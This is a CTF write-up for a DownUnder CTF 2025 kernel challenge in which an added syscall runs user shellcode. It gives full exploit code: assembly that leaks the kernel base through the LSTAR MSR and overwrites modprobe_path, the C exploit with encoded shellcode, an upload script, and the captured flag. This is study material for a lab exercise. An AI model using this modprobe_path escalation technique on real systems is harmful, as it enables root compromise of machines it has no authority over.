2025 DownUnder CTF - Writeup

Author: 堇姬 Naup
CTFteam: Squid Proxy Lovers
Rank: 8th

前言

I was quite busy during this competition, so I only solved two challenges (I’ll just write more interesting one challenge — It is kernel pwn). This was also my first time playing a CTF together with SPL.

It looks so cool, lol.

backdoor

analyze

@@ -391,6 +391,7 @@
 465	common	listxattrat		sys_listxattrat
 466	common	removexattrat		sys_removexattrat
 467	common	open_tree_attr		sys_open_tree_attr
+1337	common	backdoor		sys_backdoor

It add a new syscall on syscall table.
Its syscall number is 1337

+++ b/arch/x86/kernel/backdoor.c
@@ -0,0 +1,80 @@
+#include <linux/kernel.h>
+#include <linux/highmem.h>
+#include <linux/set_memory.h>
+#include <linux/gfp.h>
+#include <linux/syscalls.h>
+#include <linux/uaccess.h>
+#include <linux/mm.h>
+
+static void (*backdoor_func)(void);
+
+SYSCALL_DEFINE2(backdoor, void __user *, user_shellcode, size_t, size) {
+    void* sc = NULL;
+    void* page = NULL;
+    if (size > PAGE_SIZE) return -EINVAL;
+
+     page = alloc_pages(GFP_KERNEL, 0);  // order 0 = 1 page
+    if (!page)
+        return -ENOMEM;
+
+    sc = page_address(page);
+    if (!sc)
+        return -EFAULT;
+
+    // Set the page to RWX (unsafe, but for CTF)
+    if (set_memory_rw((unsigned long)sc, 1))
+        return -EFAULT;
+    if (set_memory_x((unsigned long)sc, 1))
+        return -EFAULT;
+
+    if (copy_from_user(sc, user_shellcode, size)) {
+        return -EFAULT;
+    }
+
+    mb();
+
+    backdoor_func = sc;
+
+    asm volatile(
+        "xor %%rax, %%rax\n\t"
+        "xor %%rbx, %%rbx\n\t"
+        "xor %%rcx, %%rcx\n\t"
+        "xor %%rdx, %%rdx\n\t"
+        "xor %%rsi, %%rsi\n\t"
+        "xor %%rdi, %%rdi\n\t"
+        "xor %%rbp, %%rbp\n\t"
+        "xor %%r8,  %%r8\n\t"
+        "xor %%r9,  %%r9\n\t"
+        "xor %%r10, %%r10\n\t"
+        "xor %%r11, %%r11\n\t"
+        "xor %%r12, %%r12\n\t"
+        "xor %%r13, %%r13\n\t"
+        "xor %%r14, %%r14\n\t"
+        "xor %%r15, %%r15\n\t"
+        "xor %%rsp, %%rsp\n\t"
+
+        "fninit\n\t"
+        "pxor %%xmm0, %%xmm0\n\t"
+        "pxor %%xmm1, %%xmm1\n\t"
+        "pxor %%xmm2, %%xmm2\n\t"
+        "pxor %%xmm3, %%xmm3\n\t"
+        "pxor %%xmm4, %%xmm4\n\t"
+        "pxor %%xmm5, %%xmm5\n\t"
+        "pxor %%xmm6, %%xmm6\n\t"
+        "pxor %%xmm7, %%xmm7\n\t"
+        "pxor %%xmm8, %%xmm8\n\t"
+        "pxor %%xmm9, %%xmm9\n\t"
+        "pxor %%xmm10, %%xmm10\n\t"
+        "pxor %%xmm11, %%xmm11\n\t"
+        "pxor %%xmm12, %%xmm12\n\t"
+        "pxor %%xmm13, %%xmm13\n\t"
+        "pxor %%xmm14, %%xmm14\n\t"
+        "pxor %%xmm15, %%xmm15\n\t"
+
+        "jmp *%c[func]\n\t"
+        :
+        : [func] "i" (&backdoor_func)
+        : "memory"
+        );
+    return 0;
+}

This section is the implementation of the syscall.
It need to provide two arguments. (shellcode and size)
We can get one rwx page and jump to execute your shellcode.
When it execute your shellcode, it will clear all registers and xmm value.

qemu-system-x86_64 \
    -m 256M \
    -smp 1 \
    -cpu qemu64,+smep,+smap \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 quiet kaslr kpti=1 pti=on panic=0 oops=panic" 

You can check qemu startup script.
It open KASLR、SMAP、SMEP and KPTI

How to EoP

We can run arbitary shellcode in kernel, so many way can EoP.
But, we don’t have kernel base.
So the first goal is to try to leak it. (I suspect that the key point of this challenge is to leak the kernel base, since the registers were deliberately cleared.)

My sulution is use MSR(IA32_LSTAR = 0xC0000082)
It will return entry_SYSCALL_64 address.
This address is kernel text base (rax).
Put kernel base on r8 and overwrite modprobe_path, and then return to userspace.

mov ecx, 0xC0000082
rdmsr               
shl rdx, 32
or rax, rdx 
sub rax, 0x80
add rax, 0x1b48960
mov r8, rax
mov r9, 0x782f706d742f
mov [r8], r9
mov rcx, 0x401000
swapgs
sysretq

Use socket trigger modprobe_path, you can get flag.

exploit

upload script

from pwn import *
import base64

with open("./exploit", "rb") as f:
    exp = base64.b64encode(f.read())

p = remote("chal.2025.ductf.net", 30005)

p.sendlineafter(b"buildroot login: ", b"ctf")
p.sendlineafter(b"Password: ", b"ctf")

count = 0
for i in range(0, len(exp), 0x200):
    p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp")
    count += 1
    log.info("count: " + str(count))

cnt = 0
for i in range(count):
    p.recvuntil(b"$")
    cnt += 1
    print("upload: ", cnt)

p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit")
p.sendline("chmod +x /tmp/exploit")

p.sendline("/tmp/exploit")
p.sendline("/tmp/exploit 0")
p.sendline("cat /flag.txt")
p.interactive()

exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mount.h>
#include <errno.h>
#include <netinet/ether.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <arpa/inet.h>


#define SYS_BACKDOOR 1337

// musl-gcc -static exploit.c -o exploit

void get_root(){
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'chmod 777 /flag.txt' >> /tmp/x");
    system("chmod +x /tmp/x");

    int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_MAX - 0x1);
}


int main(int argc, char *argv[]){

    if (argc > 1 && *argv[1]) {
        printf("trigger modprobe...\n");
        get_root();
        exit(0);
    }

    unsigned char shellcode[] = "\xB9\x82\x00\x00\xC0\x0F\x32\x48\xC1\xE2\x20\x48\x09\xD0\x48\x2D\x80\x00\x00\x00\x48\x05\x60\x89\xB4\x01\x49\x89\xC0\x49\xB9\x2F\x74\x6D\x70\x2F\x78\x00\x00\x4D\x89\x08\x48\xC7\xC1\x00\x10\x40\x00\x0F\x01\xF8\x48\x0F\x07";
    size_t size = sizeof(shellcode) - 1;
    printf("SIZE: %ld", size);
    long ret = syscall(SYS_BACKDOOR, shellcode, size);
}

DUCTF{n0_r3g1st3rs_n0_pr0bl3m!}

demo